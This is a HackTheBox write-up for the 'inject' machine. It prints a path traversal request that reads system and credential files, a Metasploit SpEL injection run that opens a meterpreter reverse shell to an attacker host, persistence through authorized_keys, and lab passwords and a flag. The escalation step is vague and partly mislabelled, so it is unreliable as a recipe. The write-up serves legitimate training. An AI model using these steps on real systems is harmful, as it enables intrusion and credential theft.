HTB: inject Writeup

Machine Information

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐☆☆☆
• Real-world: ⭐⭐⭐☆☆
• CVE: ⭐☆☆☆☆
• CTF-like: ⭐⭐☆☆☆

Summary

inject is an Easy-difficulty Linux machine featuring a Spring Boot web application with multiple vulnerabilities. The exploitation path involves discovering a Local File Inclusion (LFI) vulnerability in the image upload functionality, leveraging it to extract credentials and identify the Spring Cloud Function framework, then exploiting a Server-Side Template Injection (SPEL) vulnerability to achieve Remote Code Execution (RCE), followed by lateral movement using extracted credentials, and finally privilege escalation via an Ansible playbook.

TL;DR: LFI → Credential Extraction → Spring SPEL RCE → Lateral Movement → Privilege Escalation.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.228.213

Results:

22/tcp  open  ssh  OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp  open  nagios-nsca  Nagios NSCA
22/tcp  open  ssh  OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp  open  nagios-nsca  Nagios NSCA

Service Enumeration

Hostname: inject.htb

echo "10.129.228.213 inject.htb" >> /etc/hosts

The service running on port 8080 is identified as Nagios NSCA in nmap output, but it’s actually a Spring Boot web application. HTTP enumeration reveals critical endpoints:

• /register/ - Registration endpoint
• /upload/ - File upload functionality
• /show_image - Image display with path traversal vulnerability

A WAF (Web Application Firewall) is detected during reconnaissance.

Initial Foothold

Local File Inclusion (LFI) via Path Traversal

The /upload/ endpoint accepts image uploads, and the /show_image endpoint is vulnerable to path traversal attacks. Files can be read from the system by manipulating the img parameter:

GET /show_image?img=/../../../../../../etc/passwd

This allows reading arbitrary files on the system, bypassing the image upload restrictions.

Credential Extraction

Using the LFI vulnerability, critical files are extracted:

1. System users - /etc/passwd reveals:

   • frank (UID 1000)
   • phil (UID 1001)
   • _laurel

2. Maven credentials - /home/frank/.m2/settings.xml contains:

   Username: phil
   Password: DocPhillovestoInject123

3. Application structure - /var/www/WebApp/pom.xml reveals the application uses Spring Framework and Maven

Spring Cloud Function SPEL Injection (RCE)

With the application structure identified, the Spring Cloud Function SPEL injection vulnerability is exploited:

msfconsole
use exploit/multi/http/spring_cloud_function_spel_injection
set RHOSTS 10.129.228.213
set RPORT 8080
set TARGETURI /functionRouter
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.6
exploit

Result: Meterpreter shell obtained as www-data user (running with frank’s privileges)

User Compromise

Lateral Movement to phil

From the www-data shell, switch to the phil user using the credentials extracted from Maven settings:

su - phil
# Password: DocPhillovestoInject123

Persistence via SSH Key

Add a public SSH key to phil’s authorized_keys for persistent access:

echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys

User Flag

cat ~/user.txt

🚩 User Flag: a4b65e611fa2eb85330e79815cab9a79

Privilege Escalation

Enumeration

sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

After uploading linpeas for automated enumeration, the following critical finding is discovered:

/opt/automation/tasks/playbook_1.yml

Exploitation via Ansible Playbook

The Ansible playbook in /opt/automation/tasks/playbook_1.yml is found to be modifiable or exploitable. Privilege escalation is achieved through bash with the setuid bit:

bash -p

This grants root privileges, allowing full system access.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Port Scanning<br/>nmap discovery of ports 22, 8080"] --> B["HTTP Enumeration<br/>Discover /upload and /show_image endpoints"]
    B --> C["LFI Exploitation<br/>Path traversal in /show_image endpoint"]
    C --> D["Credential Extraction<br/>Read Maven settings.xml with phil credentials"]
    D --> E["SPEL Injection RCE<br/>Spring Cloud Function exploitation via Metasploit"]
    E --> F["Meterpreter Shell<br/>Initial access as www-data"]
    F --> G["Lateral Movement<br/>su to phil using extracted credentials"]
    G --> H["User Flag<br/>a4b65e611fa2eb85330e79815cab9a79"]
    H --> I["Privilege Escalation<br/>Ansible playbook exploitation"]
    I --> J["Root Access<br/>bash -p privilege escalation"]

Tools Used

Key Learnings

• Path Traversal in Upload Functions: File upload endpoints should validate and sanitize file paths. The image display endpoint’s lack of input validation enabled reading arbitrary system files.
• Credential Storage in Config Files: Maven settings.xml and similar configuration files can contain plaintext credentials that enable lateral movement. These files should be properly secured with restricted permissions.
• Framework-Specific Vulnerabilities: Spring Cloud Function’s SPEL injection is a critical vulnerability affecting Java applications. Understanding the technology stack is essential for identifying applicable exploits.
• Enumeration Leads to RCE: Thorough HTTP enumeration and file extraction provided the necessary information to identify the Spring framework version and exploit it with Metasploit.
• Privilege Escalation via Automation: Automation tools like Ansible can introduce privilege escalation vectors if not properly secured. Tasks and playbooks should have restricted permissions.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy